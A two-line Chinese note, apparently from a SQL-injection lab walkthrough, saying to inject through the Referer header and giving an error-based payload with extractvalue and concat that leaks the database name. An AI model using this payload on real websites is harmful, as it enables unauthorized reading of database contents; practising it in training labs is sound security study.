(1)根据题意,从Referer入手
(2)报错注入与上一关相同。如爆库名:
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
